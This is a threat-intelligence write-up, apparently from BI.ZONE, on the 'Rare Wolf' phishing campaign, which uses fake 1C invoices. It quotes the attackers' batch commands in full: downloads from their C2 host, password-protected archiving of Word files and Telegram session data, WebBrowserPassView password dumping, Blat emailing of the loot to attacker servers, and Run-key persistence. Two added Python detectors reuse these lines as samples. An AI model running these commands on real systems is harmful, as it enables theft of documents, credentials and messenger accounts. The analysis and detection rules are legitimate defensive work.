Rare Wolf preys on sensitive data using fake 1C:Enterprise invoices as lure

BI.ZONE
5 min read · Nov 29, 2023


How adversaries create diversions and stay invisible

BI.ZONE Threat Intelligence specialists have discovered a cybercriminal group that has been active since at least 2019. While this cluster of activity previously targeted the countries neighboring Russia, such attacks have now reached Russia itself. The attackers use phishing emails to install a legitimate monitoring tool, Mipko Employee Monitor, on target devices, gain access to the Telegram messenger, and steal sensitive documents and passwords.

Key findings

  1. Unusual attachment formats tend to lower the victim’s guard and increase the likelihood of a compromise.
  2. Hijacking Telegram accounts is particularly popular, not least because accessing the user’s data is as easy as copying a single folder.
  3. Attackers make extensive use of legitimate monitoring tools, which allows them to stay under cover inside the compromised IT infrastructure.

Campaign

The criminals sent phishing emails with archives that, as they claimed, contained 1C:Enterprise invoices and the digital keys for them. This pretext kept the victims from paying attention to the file extension. The content of the message is shown in the figure below.

The phishing email text

The archive contained an executable, 1C.Предприятие Платежная накладная №579823592352-2023.scr (a Russian file name meaning “1C:Enterprise payment invoice No. 579823592352-2023”), which was an installer built with Smart Install Maker.

Running the executable file caused the following actions:

  • Creation of a folder C:\Intel\ with the attributes Hidden, System, and Unindexed assigned to it.
  • Creation of the values Video Configurations and Mail Configurations under the registry key Software\Microsoft\Windows\CurrentVersion\Run. Their data was set to the file paths C:\Intel\go.exe and C:\Intel\mail.exe, files that would be unpacked later.
  • Creation of a file C:\Intel\rezet.cmd that downloaded encrypted archives from the C2 server using cURL and unpacked them with driver.exe:
C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe
C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar http://acountservices[.]nl/downs/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar http://acountservices[.]nl/downs/pas.rar

In addition, driver.exe, a command-line archiver invoked with RAR-style switches (-r recurses into subfolders, -hp encrypts both file data and file names with the given password), was used to collect and archive all Microsoft Word documents:

C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y

Telegram messenger data was also collected and packaged:

C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y

The attackers sent the collected data through an attacker-controlled mail server. For this purpose, they extracted the Blat utility from the pas.rar archive and used it to send emails from the command line:

C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y

Then both archives were sent to the attackers’ email account:

C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\tdata.rar"
C:\Intel\blat.exe -to %mail-in% -f "DOCUMENT<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\doc.rar"

After sending, the archives with the collected data and the cURL utility were deleted:

del /q C:\Intel\curl.exe
del /q /f C:\Intel\doc.rar
del /q /f C:\Intel\tdata.rar

Next, the go.exe file was extracted from the keys.rar archive. Execution was then paused for about an hour with the ping utility (3,600 echo requests to 127.0.0.1, sent one per second), after which the files mail.exe and userprofile.exe were extracted from the archives. The latter was launched to install the Mipko Employee Monitor software on the compromised system:

C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
ping -n 3600 127.0.0.1
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
C:\Intel\userprofile.exe

At this point, the system was forced to reboot (Win32Shutdown with flag 6, a forced restart) and the rezet.cmd file was deleted:

wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
del /q C:\Intel\rezet.cmd

After rebooting, the files mail.exe and go.exe were executed.

Launching mail.exe led to the following actions:

  • Passwords saved in the browsers on the compromised device were collected into a password.txt file. To do this, the WebBrowserPassView tool was extracted from the pas.rar archive:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"
  • Once the passwords were retrieved, the files that were no longer required for execution were deleted:
del /q /f С:\Intel\wbpv.exe
del /q /f C:\Intel\pas.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\driver.exe
  • The registry value responsible for the autorun of mail.exe was also deleted:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Mail Configurations" /f
  • This was followed by a connectivity check against www.msftncsi.com/ncsi.txt (the address Windows itself uses for its network connectivity status probe). If the check succeeded, the harvested credentials were emailed to the attacker using the Blat utility:
curl www.msftncsi.com/ncsi.txt >nul
if "%errorlevel%"=="0" (
goto ok
) else (
goto no
)
:ok
C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server [REDACTED] -port 587 -u %mail-out% -pw %pass-out% -subject "Password %COMPUTERNAME%/%USERNAME%" -body "Password %COMPUTERNAME%/%USERNAME%" -attach "C:\Intel\password.txt"
  • The files go.exe, password.txt, and blat.exe were deleted at this point:
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\password.txt
del /q /f C:\Intel\blat.exe
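The chain quoted above, from the cURL downloads in rezet.cmd through the Blat exfiltration in mail.exe, leaves a distinctive trail in process-creation telemetry. The following Python is an added example (not code from the BI.ZONE post) that runs a small rule set over process command lines as they would appear in Sysmon Event ID 1 or Windows event 4688. The rule names, the grouping into stages and the benign sample lines are constructed for this example; the malicious sample lines reproduce the commands quoted in the post.

```python
"""Command-line detections for the staging, collection and exfiltration
stages described in the post. Added example; rule names and benign sample
lines are constructed, malicious samples are the post's own commands."""
import re

# Rule name -> regex over the full command line. The campaign renamed its
# archiver to driver.exe, so the RAR rules key on the switch syntax
# (command 'a', -r recursion, -hp password with header encryption) rather
# than on the binary name.
RULES = {
    # cURL writing payloads into the hidden C:\Intel staging folder
    "curl_download_to_staging_dir": re.compile(
        r'\bcurl(?:\.exe)?\b.*\s-o\s+"?c:\\intel\\', re.I),
    # password-protected RAR of every *.doc* file on the system drive
    "rar_collect_documents": re.compile(
        r'\sa\s+(?:-\S+\s+)*-hp\S*\s+\S+\.rar\s+.*\*\.doc', re.I),
    # password-protected RAR of the Telegram Desktop session folder
    "rar_collect_telegram_session": re.compile(
        r'\sa\s+(?:-\S+\s+)*-hp\S*\s+\S+\.rar\s+.*telegram desktop\\tdata', re.I),
    # Blat sending a file as an SMTP attachment
    "blat_smtp_attachment": re.compile(r'\bblat(?:\.exe)?\b.*\s-attach\s+', re.I),
    # ping to localhost used as a sleep; the request count is checked in scan()
    "ping_sleep": re.compile(r'\bping(?:\.exe)?\s+-n\s+(\d+)\s+127\.0\.0\.1', re.I),
    # forced shutdown (5) or forced restart (6) through WMI
    "wmic_forced_shutdown": re.compile(r'\bwmic\b.*win32shutdown\s+[56]', re.I),
    # WebBrowserPassView dumping saved browser passwords to a text file
    "browser_password_dump": re.compile(r'\bwbpv(?:\.exe)?\s+/stext\b', re.I),
}

MIN_SLEEP_SECONDS = 300  # ping -n below this is routine connectivity testing

# Which stage of the chain each rule belongs to (constructed grouping).
STAGES = {
    "staging": {"curl_download_to_staging_dir"},
    "collection": {"rar_collect_documents", "rar_collect_telegram_session",
                   "browser_password_dump"},
    "exfiltration": {"blat_smtp_attachment"},
    "evasion": {"ping_sleep", "wmic_forced_shutdown"},
}

# Constructed sample: two benign lines, then the post's own commands.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\ping.exe -n 4 8.8.8.8',
    r'"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 C:\Users\u\Desktop\report.rar C:\Users\u\Desktop\report.docx',
    r'C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe',
    r'C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y',
    r'C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y',
    r'C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "x" -body "x" -attach "C:\Intel\tdata.rar"',
    r'ping -n 3600 127.0.0.1',
    r'wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6',
    r'C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"',
]


def scan(cmdlines):
    """Return {rule_name: [matching command lines]} for the given lines."""
    hits = {}
    for line in cmdlines:
        for name, rx in RULES.items():
            m = rx.search(line)
            if not m:
                continue
            if name == "ping_sleep" and int(m.group(1)) < MIN_SLEEP_SECONDS:
                continue
            hits.setdefault(name, []).append(line)
    return hits


def chain_stages(hits):
    """Return the set of chain stages with at least one hit. Collection and
    exfiltration seen together on one host is the strong signal."""
    return {stage for stage, names in STAGES.items() if names & hits.keys()}


if __name__ == "__main__":
    found = scan(SAMPLE_CMDLINES)
    for rule, lines in found.items():
        print(f"{rule}: {len(lines)} hit(s)")
    print("stages observed:", sorted(chain_stages(found)))
```

The rules deliberately avoid matching on the renamed binary names (driver.exe, go.exe) and on the C2 domain, which change between intrusions; the archiver switches, the Telegram tdata path and the Blat -attach option are the parts of the chain the operators have little reason to vary.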

Running go.exe triggered the following actions:

  • Remove the Mipko Employee Monitor configuration if it is already present on the system:
del /q /f %PROGRAMDATA%\MPK\S0000
  • Unpack all files from the keys.rar archive into the C:\Intel folder:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\keys.rar C:\Intel\ /y
  • Unpack the MPK.rar archive containing the connection configuration into folder C:\Users\[user]\AppData\Local\:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\MPK.rar %PROGRAMDATA%  /y
  • Rename the file C:\Users\[user]\AppData\Local\MPK\S0000.txt to C:\Users\[user]\AppData\Local\MPK\S0000:
ren %PROGRAMDATA% \MPK\S0000.txt %PROGRAMDATA% \MPK\S0000
  • Add a value named Userinit under the registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to launch Mipko Employee Monitor at system startup:
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f
  • Launch Mipko Employee Monitor:
start C:\Intel\userprofile.exe
  • Delete temporary files that may be in the folder C:\Intel\:
del /q /f C:\Intel\MPK.rar
del /q /f C:\Intel\keys.rar
del /q /f C:\Intel\curl.exe
del /q /f C:\Intel\dc.exe
del /q /f C:\Intel\dc.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\open.lnk
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\go1.exe
del /q /f C:\Intel\mail.exe
  • Delete the registry value responsible for the autorun of go.exe:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Video Configurations" /f
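The persistence left behind by go.exe is a Run value with a name borrowed from a Windows component (Userinit legitimately lives under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, not under a per-user Run key) whose data points into the C:\Intel staging folder. The following Python is an added example (not code from the BI.ZONE post) that parses the text printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags such entries. The sample output is constructed: the OneDrive line is a typical benign entry, the other three reproduce the value names and paths quoted in the post; the list of impersonated names and suspicious directories is an assumption for this example.

```python
"""Triage of Run-key autorun values for the persistence pattern described
in the post. Added example; the sample reg query output, the impersonated
name list and the suspicious directory list are constructed."""
import re

# Constructed sample of `reg query HKCU\...\Run` output (4-space separators).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Video Configurations    REG_SZ    C:\Intel\go.exe
    Mail Configurations    REG_SZ    C:\Intel\mail.exe
    Userinit    REG_SZ    C:\Intel\userprofile.exe
"""

# reg query prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data
VALUE_LINE = re.compile(r'^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$')

# Names of Windows components that never belong in a per-user Run key;
# an autorun using one of them is impersonating a system entry (assumed list).
IMPERSONATED_NAMES = {"userinit", "winlogon", "explorer", "svchost", "csrss", "lsass"}

# Directories from which user autoruns are rarely legitimate (assumed list,
# lower-case, with trailing backslash so "c:\intel\" does not match "c:\intelfoo\").
SUSPICIOUS_DIRS = (
    "c:\\intel\\",
    "c:\\programdata\\mpk\\",
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
)


def parse_reg_query(text):
    """Return a list of (name, type, data) tuples from reg query output."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).strip()))
    return entries


def exe_path(data):
    """Extract the program path from value data: the quoted part if the data
    starts with a quote, otherwise the first whitespace-delimited token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def triage(entries):
    """Return the entries that look like this campaign's persistence, with
    the reasons each one was flagged."""
    findings = []
    for name, _type, data in entries:
        path = exe_path(data).lower()
        reasons = []
        if name.lower() in IMPERSONATED_NAMES:
            reasons.append("value name mimics a system component")
        if any(d in path for d in SUSPICIOUS_DIRS):
            reasons.append("binary runs from an unusual staging directory")
        if reasons:
            findings.append({"name": name, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"{f['name']!r} -> {f['path']}: {'; '.join(f['reasons'])}")
```

The same parser works on the HKLM Run key and on the RunOnce keys; on a live host, pair it with a check that C:\Intel (or whichever staging folder the value points to) carries the Hidden and System attributes described earlier, since a normal installer has no reason to hide its own directory.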

The Mipko Employee Monitor software lets the attackers monitor user activity: intercept keystrokes, log the clipboard, record the screen, and capture the device camera.

Conclusion

Cybercriminals continue to leverage dual-use software and legitimate tools to launch targeted attacks. This often allows them to blend into the compromised IT infrastructure and bypass multiple defenses. In addition, it is important to monitor the threat landscape of neighboring countries: attackers may change their targets over time, influenced by geopolitical events, among other things.

MITRE ATT&CK

Indicators of compromise

  • acountservices[.]nl
  • 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56
  • e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86
  • e1e9b7182717f6851e7deb0aadf8f31c67bf43e2d8ef5b052e697f467ec2e3f3
  • 4999f77a5a52d79dbb4b14dd7035aed21aecf85631ea20b91d7adf97f7b729e8
  • a49092711a56efc520416e53bbc9891092d1d970e154b923b7603083bbd7d870
  • a9eeffdad26eabe90fc32a79700af671daefd43eb7ecfb8f20ce4e667cbd8dcb

A full list of the indicators of compromise is available to the users of BI.ZONE Threat Intelligence.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

Legitimate tools are applied more and more often today to attack companies. Preventive defenses do not detect such methods — the intruders penetrate the infrastructure unnoticed. To discover such attacks, we recommend that companies implement detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their security operations center.


BI.ZONE

BI.ZONE: an expert in digital risks management. We help organizations around the world to develop their businesses safely in the digital age